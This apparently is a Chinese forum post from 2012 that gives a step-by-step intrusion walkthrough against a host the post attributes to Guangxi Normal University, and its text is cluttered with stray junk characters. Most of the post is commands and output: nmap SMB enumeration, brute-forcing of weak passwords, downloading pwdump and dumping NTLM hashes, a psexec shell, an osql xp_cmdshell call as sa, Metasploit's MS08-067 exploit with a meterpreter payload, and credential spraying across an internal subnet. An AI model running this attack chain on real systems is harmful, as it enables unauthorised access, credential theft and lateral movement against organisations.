广西师范网站http://202.103.242.241/
( e4 x( h! s0 v( y& v3 i4 U& c, M4 }* D/ X! O [
root@bt:~# nmap -sS -sV 202.103.242.241
1 B( C" B5 |, p+ ?% C4 h3 N; Q5 T5 h! i( k/ S% c" Q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
1 T- k9 W+ `4 L0 q" M% v/ T& }
4 ~1 X3 Z% y& t, VNmap scan report for bogon (202.103.242.241)
9 h8 H1 b$ N' g8 y; p
3 l. o0 P" O9 h0 M" i! `Host is up (0.00048s latency).# i' c. L, J/ x" O6 y
) p7 M3 b' O1 j+ F
Not shown: 993 closed ports; X: c: T* w/ @8 O9 u
( W! r. N7 H7 A' P* v8 ^, q
PORT STATE SERVICE VERSION
6 f. V8 D0 ]$ g. f* v- b' N7 T; H' A- Z% ]% t
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
5 l! }9 D1 \$ M* s7 P! c% x- e0 |7 {
139/tcp open netbios-ssn+ r2 r6 A$ o7 x3 k$ _: B4 P5 }
- s }/ p3 m1 z1 ^4 E* B445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds0 Z2 A9 q' v- m1 U; C3 |
# `' p3 K, C; H1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
, \) }" f& X( f' ^9 I3 T% e( t- F# `/ O' A8 o
1026/tcp open msrpc Microsoft Windows RPC3 v; s) b$ t q$ M: z/ `
" L, K- g' r( T
3372/tcp open msdtc?2 T4 S& g4 R# d: N' g3 Q7 K
( F+ ?2 f/ f7 | d; M" W. i: [
3389/tcp open ms-term-serv?& h- E) e$ \1 z5 H( H: R) H& _6 C
9 F8 F0 p) Y. o+ G. c& `
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
6 [/ I4 O. R1 f" h/ o0 S' g: ]SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
5 t. w# o: |6 y" L
" R w( u0 C3 ASF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
, G7 b/ F" T% E( m. \7 b' p! z( ]0 K/ K; T8 l6 C
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)/ r) Q+ r" D8 M G' W
+ m( @! {* y% ]) i5 Y h8 F# C
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
1 ~- k% M! l. Z0 \* l% M1 n
- ]( r, h5 K- J. RSF:ptions,6,”hO\n\x000Z”);
& r3 a, y0 S9 ?6 a) W% t
; f5 O! O; ~ ?! j# r( r: cMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( ^* F) o- V2 o! S g4 t! }2 g: o6 p# r+ o2 m. W/ Y4 g
Service Info: OS: Windows' m% n! B0 H2 V% Q
$ y3 t0 s/ Z# R4 ~
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
1 q+ l5 {! J% q7 m N$ k: M w1 |/ I% V% ~. V4 f6 j
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
' Z, S9 s8 F- ^' S
1 i# F4 m0 L( r o( j5 g/ ^2 oroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本. t1 n2 z; j2 ?+ R+ ]$ x9 @$ B3 J
1 ?: }0 o1 b( Y! C1 ^' \, R-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
( p7 M3 @7 c0 T o1 Q! e" p
4 \0 Y! y- T) t/ x- E1 ]-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
. P$ p# Y( @' U$ T* s" W
) ^ X! e7 B0 `-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
/ U# _7 j" }6 F- _5 Y& u
8 O% z1 [- M1 s+ E& X$ b-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse" z1 K8 Q2 j3 ^
8 y: Q( Q5 u& X: j! P
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
4 x' m" p+ W" o) z( C
0 O& G q3 R R( {) Q( M, ~$ M-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse9 R( O$ }; G/ W- a0 B5 F( U5 Y
/ V6 j0 g1 b! G) J1 |
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse; X+ q' D; ^& v6 Y3 ]9 @
* U6 N/ L q- C3 X-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
h( x* d/ d& H! c9 [+ Q* | ]9 W
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
, o. o1 U. z! J( n, v. Q5 j. ^: G; h. v8 P" {
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
6 A* t- {( O) l7 r) H4 h+ f% X" u7 x+ _
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
/ p0 ~% e; X) }) [' G1 K4 M6 E* C: z4 d% S' j, I/ Q& Y/ Y
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
' e Y5 d! k6 b( @, F$ m. Z
6 {9 B: L9 L8 J, B/ K-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse4 `7 D: S- V: ^- I; t/ r7 u# s8 B, t, f
x* O" l4 p/ Q& n' n-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse3 l! \% P# B9 B+ ]# y: q
' w; `# U/ p% m9 a6 B3 @7 m-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
: s) A4 o; Z! B3 S/ T4 c
! ]. d" O! \3 o) h3 O& Kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 : ~. v; Y( ~. c) v% A5 X8 ^
( n+ b/ j5 R+ `% D
//此乃使用脚本扫描远程机器所存在的账户名
) ^, u" Z* n1 v' q! {) G5 S: e
+ g% d [2 ^* N! B. W: WStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST7 v0 P H0 Y# ?$ u
$ F: }0 [& w- P& A/ @
Nmap scan report for bogon (202.103.242.241)% D' G5 G3 I5 b
6 X0 ]2 R8 k' L! ?# Q3 U, C
Host is up (0.00038s latency).! u9 w$ d' T/ b% B
( i6 }- F. @8 j2 `) z3 @Not shown: 993 closed ports; D! h4 w& ]) A1 @; W, N( F
. q0 k3 y2 c& b. ]' f
PORT STATE SERVICE+ K8 i' }$ N. j: q
8 J: ]1 a$ p* Q, A& t
135/tcp open msrpc
% J5 s8 O% o/ P; \9 ^6 S, M; L e, F* j1 b' Z2 H& E3 o
139/tcp open netbios-ssn
6 I1 F2 [: G; a
6 u! f$ [& C$ x( k" a+ Z% r& t+ _445/tcp open microsoft-ds
) u( @$ J9 N5 u
. ?5 R% \6 g) A( d1025/tcp open NFS-or-IIS
9 @% F: X+ v2 [) L e6 d( F; Y7 h; D8 v$ u
1026/tcp open LSA-or-nterm
6 |6 _3 V7 a" J( m. y* P8 c0 Q+ q+ Q7 l
: y6 f% p2 Y- n3 R' e3372/tcp open msdtc
' p) F# d. f, F& _
' C G, [' }7 p# B3389/tcp open ms-term-serv
( O. [ ^& C- C' P/ f
( _; X2 O1 K# p- q2 c8 r5 ~1 {5 }, [MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 X; ~+ A* B' W E8 V# g1 A5 [+ O
/ ]9 { C5 b7 J( a" \) q- W$ eHost script results:8 |6 }' [* I: d6 S9 `* _$ T
# i: ?. K, ^8 c8 _7 G: |& W" U8 P
| smb-enum-users:
" a" S. z& |( ]8 S1 w* N, ?6 v- H9 @2 K! C! t9 R( Y" Y- R
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果4 y: Q+ U8 |* Z, Z( z
7 ^ o9 o* G) s/ Y4 X' o
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds1 H0 U0 q- @/ q% S7 X
/ T8 x! r$ t& A: V
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
6 U" ~; y' d7 T# ^4 y8 v( `( x9 Z8 j; ?% H! x9 G! \
//查看共享: @; ?8 y8 O3 k
1 z. D& o2 e4 I: C
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
' `4 c; r' t9 ~0 A
3 _8 e$ T0 s; |/ Z1 VNmap scan report for bogon (202.103.242.241)
* @9 T' Q0 Y/ p6 r8 @8 k3 Z4 ?' D2 i3 M
Host is up (0.00035s latency).
, a; Z+ I0 u, ]) k/ {7 H+ \: A
* w {7 p" @' e( U% [9 q; _& I" NNot shown: 993 closed ports' J. Y- c4 |$ O
' G2 N8 v `: LPORT STATE SERVICE
_' q" o4 s* X; y j! n
& Q1 l' U" E2 f0 U7 t9 g. J135/tcp open msrpc7 g0 L7 @' ]+ w& I! w
8 `( y, E# r, V# W
139/tcp open netbios-ssn
% F1 H) c o8 U7 ~! T/ a+ k
: D% c! e5 s& w2 b8 A445/tcp open microsoft-ds
& I% J5 p' @0 z$ g
|5 i% F; s& y" z- G8 W* q1025/tcp open NFS-or-IIS6 w# G. O4 S% X. F3 j ?+ ]) t- J
5 N }- W. ^+ D! e8 Z: A
1026/tcp open LSA-or-nterm1 @' L$ r' _9 Q: g& X$ W5 @( Y
3 N) [4 [% Q7 K8 t- m0 t$ _' U
3372/tcp open msdtc
5 h! J" Y O Q1 k4 S3 V2 _0 l$ t* L; V0 F: j* R6 M
3389/tcp open ms-term-serv+ h1 D# K Q& X n6 t. M
6 ?* M! a" e2 m1 L _" ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& Y& `1 l. L* `. x' x$ L) E+ |7 {# O. R U
Host script results:2 N6 H" }/ Z5 q( ?1 ~; m0 L; G
$ L9 H$ }- n4 ?. q0 R2 \! R| smb-enum-shares:" \& \" V7 ~7 _# f [' d4 e
( J2 ~0 |5 h& C& W! D3 P6 A| ADMIN$
3 L/ P [7 M) R# P3 j7 ^! j* J8 E& m3 q' z, c
| Anonymous access: <none>
2 I, A2 ~: I2 Z' p2 `1 {! ?7 _; b, c0 j }* l- Y+ k6 r
| C$: i$ c$ q5 e1 }
" p3 [: H1 k1 Q q| Anonymous access: <none>: p2 `9 `+ \/ v+ X/ M& f3 i( u; H
7 |- E" P0 J* o0 \( I0 t% x8 e: n' K$ }| IPC$$ o1 L- N$ m; g& d8 K% D9 m6 E9 D5 r
$ g0 b( o7 }+ z
|_ Anonymous access: READ2 B, X8 A2 z5 l* e! U. q4 r) N
( C6 P5 M! Q2 l
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds% `0 F5 F( a$ j) |: B' p
+ G1 r' _, y" V1 W
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
1 N/ e/ z3 B. w9 i: z% `9 N, _4 [- \% s- c# U3 i% B4 a5 ~$ ^2 r
//获取用户密码* c. h% u- L3 w& Y5 l; n- N
+ J. C( M1 [2 V/ J8 [. f: N
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
2 J6 b$ S. [: q+ n: m4 Z+ z8 p$ _3 ~8 Q! B0 O: v
Nmap scan report for bogon (202.103.242.2418)
9 e- D) [4 r) r! ?3 y7 `/ ?
r6 X) f7 d. Z' N) J+ uHost is up (0.00041s latency).
; p, @0 l' F% x8 s. ~0 o( Q# O* R# v2 [+ G7 g& \
Not shown: 993 closed ports* I' F7 q' B1 g1 r
2 T/ C- ]6 P7 p7 Q& y
PORT STATE SERVICE# q# u! B) q1 H$ e
- I7 O% o6 {+ [+ u135/tcp open msrpc
@9 ?/ | b. L1 F1 n9 o
4 g+ u5 _$ H% F3 H; L \+ Z. i3 `139/tcp open netbios-ssn
" Y3 W( L% u. g* b
9 U- D; [3 a5 v6 a: P8 o& {* }445/tcp open microsoft-ds
& k1 s! }7 v$ w& a- A$ h6 J8 r
1025/tcp open NFS-or-IIS6 I4 ]! c& v5 u- u8 X
: U: \" g+ a. H+ g c8 L# e
1026/tcp open LSA-or-nterm* P$ P! d6 I7 n( U* w
& e+ M, ]1 Y4 }# ^* k$ c3372/tcp open msdtc
0 a$ k4 C' J A ~
2 q5 D* G; }1 X3389/tcp open ms-term-serv
+ {9 t! L" X4 c' d3 k
" k8 k' [7 B- m: }7 p [3 h2 OMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
5 ~) T' `9 A: n
0 e2 L7 e# m/ S& oHost script results:- y* D& C$ `' }7 { L
/ P' M) H# w4 a! r| smb-brute:
) }# P$ }/ `. e1 e/ \# `. c2 V
administrator:<blank> => Login was successful
% o V* `3 k/ z2 F3 K
% ~# \8 v4 F; E; ]|_ test:123456 => Login was successful
/ m: `8 C( ^+ G! `9 y: v0 j$ k4 X% x0 H# C' f
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds& |3 \2 H. o) D6 A
$ c1 ^, {4 K; m' eroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
) i+ u- l! y6 a* _8 n( X. c8 i* O- `" c/ }, u3 G' n# i& O0 _
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data' [ ?. F' I" Z( G4 e
* G0 i1 s: B" l9 i. g
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
% j \: P( b# w, |+ x
" i4 x2 [" I" H+ S7 X, Y: Zroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
4 ~4 D. M; P9 L" q
3 Q0 I/ m$ a% t T6 S- KStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
H/ {2 ^* v+ V1 A! L" Z# J, Y9 y% i6 S9 e4 E$ ^
Nmap scan report for bogon (202.103.242.241)! w3 p% i: h- |& z
- L. R1 P& G1 H9 q3 @3 `
Host is up (0.0012s latency).
7 S d* Q, R) c4 u4 n. v7 V5 U" r& X
PORT STATE SERVICE' E e# [& E# I/ A( T1 Y. B, b
G& Q) \+ L% @2 L2 ^% s6 b o/ o
135/tcp open msrpc% R) l; [& a" k, E4 k! Y
/ q9 D; Q: F; p/ k( y
139/tcp open netbios-ssn. G) Z: n' }$ S e% B( W+ G9 U
+ ~6 S; }! s/ x5 ]) y0 d# A; t
445/tcp open microsoft-ds6 `% \/ m5 G* A% f" }8 _
4 h' R% O) m! ] l! U( iMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ M" G+ V$ ~, v; J; A9 m
0 z/ n: r) [5 ~, k, A7 d' aHost script results:" ?; `% v# o. ~# ]
$ C( w! d! ~9 ], W5 M% G0 i* W| smb-pwdump:7 V# F) f& }9 E2 ]- g1 I' |; p
7 H0 H) i+ ^$ J' X# Q% r. l) \
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************6 Y0 Z) v/ x: I0 W3 j. S
& ^6 \( y3 s( _( `2 I| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
7 [) k8 z& m; f j9 Z% Y; m; K& f0 m3 T& U
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4+ J1 `& G# R" e4 m2 t- I+ N
2 f& _9 W5 e' Q7 l. r+ Q|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2+ ?) |0 L/ L: W& m/ f5 Q9 Y
0 h% m( F3 L! x0 CNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
2 J* p2 a) Z: f/ }/ {: p6 c7 ?' i$ i% N1 d
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell; v; U# F+ w6 F4 a
: ~. t% `( z: C0 i, Q& k
-p 123456 -e cmd.exe! B4 D: i4 T K4 A
- l) Z& o9 y+ J1 }6 G! MPsExec v1.55 – Execute processes remotely
& a# f! V6 H( S, P! U
M% _( z% R- ~& f2 y; x: [Copyright (C) 2001-2004 Mark Russinovich
/ ], j$ e- Z, o
3 J6 V1 b: X) ^7 \Sysinternals – www.sysinternals.com
. w1 b7 s ^) a8 x1 D9 {. Q# g; l1 L( O% \1 Z
Microsoft Windows 2000 [Version 5.00.2195]
3 [% t: }7 w: \6 _) Z+ v$ g
% M: H5 \2 s2 Q& ]' C. n* ~0 I- [(C) 版权所有 1985-2000 Microsoft Corp.& z; r4 ]- A3 ^/ D$ J
, B* B# G1 A: Y+ K, d5 yC:\WINNT\system32>ipconfig
" y- c+ I! o4 B" }- L' K# E$ [) Q7 G8 g6 R. }% U% ?
Windows 2000 IP Configuration% \9 {1 q, S6 z% H& _; d6 g3 V
$ U6 g) ^. J/ B' b( M( H
Ethernet adapter 本地连接: N. ~, s5 I- [
; ]1 R; q. o/ C; B w6 w3 \0 F) k F8 {
Connection-specific DNS Suffix . :5 v& ^# K; A6 m6 p. Z
" u3 X: v4 a( O$ h& eIP Address. . . . . . . . . . . . : 202.103.242.241& d8 w" Z) t; ?! F) y; V
- S) T+ N# y9 t5 f: F
Subnet Mask . . . . . . . . . . . : 255.255.255.0
5 D. _; q V3 D
1 ^5 i3 l' e3 \ }4 DDefault Gateway . . . . . . . . . : 202.103.1.1* q9 l M$ n" [4 _7 y" }* D, u# a
* A+ M7 e6 D1 w# W: b( hC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
! b1 K1 P. `2 ~0 m/ E- }3 [7 z Z, @0 ]. Z8 v {
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
8 W. a# n! @" K M/ z+ U; L3 [" j: l. U: e% \# ]: `9 R
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST6 P0 _3 Z) W8 d( D
: K u) z' `$ s, w N$ b3 s2 a
Nmap scan report for bogon (202.103.242.241)7 y" S% K" ?9 F& G4 K! Z( M
$ R u' j; U0 g0 {Host is up (0.00046s latency).: Z9 m" [ c# {4 U/ g
4 U# U% A" F8 uNot shown: 993 closed ports1 x8 R* a, W4 U; b5 W: T
5 r: ^# x9 ]' n ?, l$ c. @PORT STATE SERVICE- Y: B) h' F3 e2 v3 v- d# J
k, b6 W# A+ {; Y4 p- ~3 h. \135/tcp open msrpc- s6 X8 m6 g& {) x0 B. u$ b( E8 L# ?
& w1 W5 q7 d& }$ l& ?0 {/ }139/tcp open netbios-ssn
) U# i7 z6 N4 M7 [. f3 z# \
. u3 ~5 M! R% I8 E445/tcp open microsoft-ds
. ]& z/ I9 `7 d( s/ I# [$ A
; ?' T! N) Z& L' a& G6 T1025/tcp open NFS-or-IIS
6 A4 T9 g8 Q6 |3 t" A% W* x6 h
; ]+ e' ?3 [9 t4 r+ c* M1026/tcp open LSA-or-nterm2 ?# A3 `+ A8 ~6 S! x& K% z7 I
X- n% t k7 Y( H, q( M* E5 o2 {4 N
3372/tcp open msdtc
8 G# v* W8 ?4 s* |& s$ z
' f/ m6 R, ?% S3389/tcp open ms-term-serv
5 x- R" ^8 ^4 F" Q; Y3 k2 O8 o# Y$ j$ m% P# }
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( H8 v/ H2 m! S: G; |
* c8 U4 e+ k e3 B6 [- l- R& Z3 x6 pHost script results:
9 ^2 e* K: j( o# K* u3 C" U7 D2 Y0 g; k1 J# j2 X0 g5 n
| smb-check-vulns:
7 l6 e' A! h6 d3 B; e) s' [8 d9 n: P# a6 o2 V) o8 X1 x5 e# ?
|_ MS08-067: VULNERABLE: \* _9 j/ k. ]0 @
* j! J P$ y5 _2 B
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds/ o* d* f, m7 N0 z. P
2 l( J, o3 q% ]# Mroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
9 R b$ Z1 P! I0 `! X' C# _3 U/ t. t, T' [/ B
msf > search ms085 O& L' O% m& Q* q6 p9 W
0 w7 X* K* ]* }- ?' \: }msf > use exploit/windows/smb/ms08_067_netapi
. K) U. U+ g* |/ f9 J; X8 B, j9 y4 S4 J: q4 Z
msf exploit(ms08_067_netapi) > show options/ H: I, S* f( A( W# L8 E
4 W6 q N$ A( P: Fmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
+ Q2 ^& p" @& R
4 I( G" p4 U; Kmsf exploit(ms08_067_netapi) > show payloads
& }! n# a7 G7 ^' L1 a/ b! Y5 N: U' I& [7 w9 {: @
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
# M6 {! D( V5 x$ ~- a( c8 c0 j# Y! U! A& S. Q# y/ M& K7 V" y
msf exploit(ms08_067_netapi) > exploit
% K' Y9 N, W/ a3 z4 u8 ~9 I& @& q+ Q; f" z
meterpreter >
; @* V# D# O# H) c4 V( y/ Q
8 T* s7 _ m2 x vBackground session 2? [y/N] (ctrl+z)6 t& B% {$ \- `- U
. t1 l* G- P% O1 j
msf exploit(ms08_067_netapi) > sessions -l
$ Q" M% Y" O' N+ }& R& ]' K0 m; a- ~; @! y! o, ` U* J V
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
2 Z1 I @/ n8 X7 ]$ O+ t2 x l3 R! u# K& n/ A
test2 h8 e; G) V/ x$ X; {) l
& Y# f5 a: z r) k
administrator2 n ?/ v4 z1 Q% Q0 `. B! p- ~' f
3 R* N" A6 |$ I( m6 P# w" @6 c' xroot@bt:/usr/local/share/nmap/scripts# vim password.txt
6 l4 Y8 c$ ]7 | J) m6 n! [/ L$ Z
8 v7 O/ V' U$ Z( E7 `& k2 h4 U+ U44EFCE164AB921CAAAD3B435B51404EE( ^7 D( ~) ]) b; y2 [* C( J
+ w" o9 W0 z3 `4 B7 Z
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 % @7 k* \4 {8 i: M$ s
) D+ R4 J# Z7 Z
//利用用户名跟获取的hash尝试对整段内网进行登录
1 k5 t2 ~0 F& f/ o% n3 v# N
) r+ W& G1 `: |( b Y0 I7 INmap scan report for 192.168.1.105
) m# q1 o9 {- y+ L' E
/ D; ^6 d7 ]: o" A2 KHost is up (0.00088s latency).# Y3 ?5 H* @" Y \7 X" v( G
5 t3 K6 H% T% r9 fNot shown: 993 closed ports
8 N# B0 @) l6 A9 s' u( [$ ]# c! h0 @5 G' P0 ?9 |% q
PORT STATE SERVICE
7 z$ B5 `" W3 B1 m) r: w- R
5 p9 a8 W4 ]( w& w- O: E! G135/tcp open msrpc
/ c- r9 C1 ?+ c: K5 s4 d) ^! N' T' t& T
- q$ v0 C, r I& [5 R. @139/tcp open netbios-ssn3 ~6 h* C" `; q4 a* ^
$ \, a1 q& M) i z3 K445/tcp open microsoft-ds
$ w# z. v+ \5 c& d# U4 O% p9 f
1025/tcp open NFS-or-IIS
' M# }( d" D5 v* J; A1 N) H" |- q- T3 [' R! }1 n# c
1026/tcp open LSA-or-nterm
: X# Z) w7 _$ D S1 Q
. k4 F Z3 g0 J! p$ y/ ~ ?% [3372/tcp open msdtc( L4 F9 f6 @3 s1 z! T
3 |* y! B9 Y: z7 u- Z: r3389/tcp open ms-term-serv9 f$ `, t8 n5 ^
& t3 L& d( E6 k. g) E0 q" p$ S
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) c% d1 k p9 g B/ O- l2 F$ O0 \& ^8 Y; L& f! u3 u' E4 b
Host script results:; a1 q g R2 I& t* d7 b
. b, @* O, ^8 {* G0 E| smb-brute:" l& w: g% c5 x. Q
. |* n9 j; ]! f5 I: l|_ administrator:<blank> => Login was successful/ |- F$ Q0 |% |
5 s/ E0 M% g/ F. `( ^攻击成功,一个简单的msf+nmap攻击~~·
$ Q) S3 j" a/ K* e- [+ V. A+ ?5 H& h& J
|
发表于 2012-12-4 12:46:42
收藏
支持
反对